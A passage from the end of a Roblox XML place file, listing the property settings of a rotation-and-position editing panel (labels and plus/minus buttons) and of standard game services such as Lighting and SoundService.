							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4278190080</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">RotZ</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>163</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX59">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294835709</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-64</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">Z: 0</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX60">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX61">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX62">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX63">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
					<Item class="TextLabel" referent="RBX64">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293980146</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4279970357</Color3>
							<int name="BorderSizePixel">1</int>
							<token name="FontSize">0</token>
							<string name="Name">TextLabel2</string>
							<UDim2 name="Position">
								<XS>0.5</XS>
								<XO>-25</XO>
								<YS>0</YS>
								<YO>110</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>0</XS>
								<XO>50</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<string name="Text">Rotate Selection:</string>
							<Color3 name="TextColor3">4294967295</Color3>
							<float name="TextTransparency">0</float>
							<bool name="TextWrap">false</bool>
							<token name="TextXAlignment">2</token>
							<token name="TextYAlignment">1</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
					</Item>
					<Item class="Frame" referent="RBX65">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293914353</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4291690598</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">PosLookVector</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>89</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX66">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294901502</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-64</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">LookVector</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX67">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX68">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX69">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291414473</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX70">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
					</Item>
				</Item>
			</Item>
		</Item>
	</Item>
	<Item class="StarterGui" referent="RBX71">
		<Properties>
			<string name="Name">StarterGui</string>
			<bool name="ShowDevelopmentGui">true</bool>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="SoundService" referent="RBX72">
		<Properties>
			<token name="AmbientReverb">0</token>
			<float name="DistanceFactor">10</float>
			<float name="DopplerScale">1</float>
			<string name="Name">SoundService</string>
			<float name="RolloffScale">1</float>
			<bool name="archivable">true</bool>
		</Properties>
		<External>RBX73</External>
		<External>RBX74</External>
		<External>RBX75</External>
		<External>RBX76</External>
		<External>RBX77</External>
		<External>RBX78</External>
		<External>RBX79</External>
		<External>RBX80</External>
		<External>RBX81</External>
		<External>RBX82</External>
		<External>RBX83</External>
		<External>RBX84</External>
		<External>RBX85</External>
		<External>RBX86</External>
	</Item>
	<Item class="PhysicsService" referent="RBX87">
		<Properties>
			<string name="Name">PhysicsService</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="BadgeService" referent="RBX88">
		<Properties>
			<string name="Name">BadgeService</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="Geometry" referent="RBX89">
		<Properties>
			<string name="Name">Geometry</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<External>RBX90</External>
	<Item class="Debris" referent="RBX91">
		<Properties>
			<int name="MaxItems">1000</int>
			<string name="Name">Debris</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="Timer" referent="RBX92">
		<Properties>
			<string name="Name">Instance</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="ScriptInformationProvider" referent="RBX93">
		<Properties>
			<string name="Name">Instance</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<External>RBX94</External>
	<Item class="Selection" referent="RBX95">
		<Properties>
			<string name="Name">Selection</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<External>RBX96</External>
	<Item class="Lighting" referent="RBX97">
		<Properties>
			<Color3 name="Ambient">4293914607</Color3>
			<float name="Brightness">1</float>
			<Color3 name="ColorShift_Bottom">4278190080</Color3>
			<Color3 name="ColorShift_Top">4286196992</Color3>
			<float name="GeographicLatitude">41.7332993</float>
			<string name="Name">Lighting</string>
			<Color3 name="ShadowColor">4294967295</Color3>
			<string name="TimeOfDay">20:53:00</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<External>RBX98</External>
	<Item class="ChangeHistoryService" referent="RBX99">
		<Properties>
			<string name="Name">ChangeHistoryService</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="CollectionService" referent="RBX100">
		<Properties>
			<string name="Name">CollectionService</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<External>RBX101</External>
</roblox>